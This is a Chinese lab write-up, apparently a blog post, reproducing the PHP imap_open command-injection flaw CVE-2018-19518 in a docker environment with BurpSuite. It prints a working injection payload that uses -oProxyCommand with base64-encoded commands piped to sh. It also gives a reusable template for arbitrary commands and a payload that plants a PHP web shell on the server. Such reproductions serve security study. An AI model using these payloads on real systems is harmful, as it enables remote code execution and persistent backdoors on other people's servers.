CVE-2018-19518PHP漏洞

1.启动环境

bash 复制代码
docker-compose up -d

2.访问网站

bash 复制代码
http://192.168.63.156:8080/

3.打开BurpSuite

拦截到访问请求,发送到repeater。修改请求内容

bash 复制代码
hostname=x+-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQ%3d%3d|base64%09-d|sh}&username=xxx&password=xxx

执行的命令是

bash 复制代码
echo '1234567890'>/tmp/test0001

进行base64加密后变成

bash 复制代码
ZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQ==

需要转换一下,+(%2b);TAB(%09);=(%3d)

bash 复制代码
ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQ%3d%3d

完整的请求

bash 复制代码
hostname=x+-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQ%3d%3d|base64%09-d|sh}&username=xxx&password=xxx
bash 复制代码
# 原始payload
x+-oProxyCommand=echo	echo '<?php eval($_POST[1]);' > /var/www/html/1.php|base64	-d|sh}

# base64+url编码以后
hostname=x+-oProxyCommand%3decho%09ZWNobyAnPD9waHAgZXZhbCgkX1BPU1RbMV0pOycgPiAvdmFyL3d3dy9odG1sLzEucGhw%3d|base64%09-d|sh}

# 模板
hostname=x+-oProxyCommand%3decho%09【要执行命令的base64】|base64%09-d|sh}&username=xxx&password=xxx

这个请求forward以后。

在bash中查看是否创建成功。执行下面命令进入环境bash

bash 复制代码
sudo docker exec -it e78a02c75bd8 /bin/bash

可以看到已经创建成功test0001

参考

https://www.bilibili.com/video/BV1k14y1L7Sj?spm_id_from=333.788.videopod.episodes&vd_source=4677d71876ccb847909253468ef2f55c&p=4

CVE-2018-19518 漏洞复现-CSDN博客

相关推荐
谷哥的小弟9 小时前
CentOS Stream浴火重生
linux·运维·centos
程序员-Benothing9 小时前
Shell输入输出详解:read、echo、printf、颜色输出
linux·运维·服务器
FPGA小徐10 小时前
从 NEMU 到 AbstractMachine:程序、运行时环境与 AM 完全解析
linux·运维·服务器
qetfw11 小时前
Debian Chrony 时间同步、RAID5 与 LUKS 磁盘加密配置
linux·debian
东城居士13 小时前
Linux驱动阻塞与非阻塞访问的理解
linux·嵌入式系统
..Dauntless..14 小时前
【Linux】进程地址空间初步理解
linux·运维·服务器
Julien200414 小时前
Docker 网络(一)
linux·运维·服务器·ssh·学习方法
杨云龙UP14 小时前
一次数据库查询缓慢故障复盘:大表数据增长、SQL全表扫描导致系统响应异常
linux·运维·服务器·数据库·sql·mysql
PellyKoo15 小时前
【linux运维】ubuntu+samba 用户组独占目录权限配置踩坑记
linux·运维·ubuntu
AR-26710-15 小时前
Linux Day15——系统管理复习
linux·运维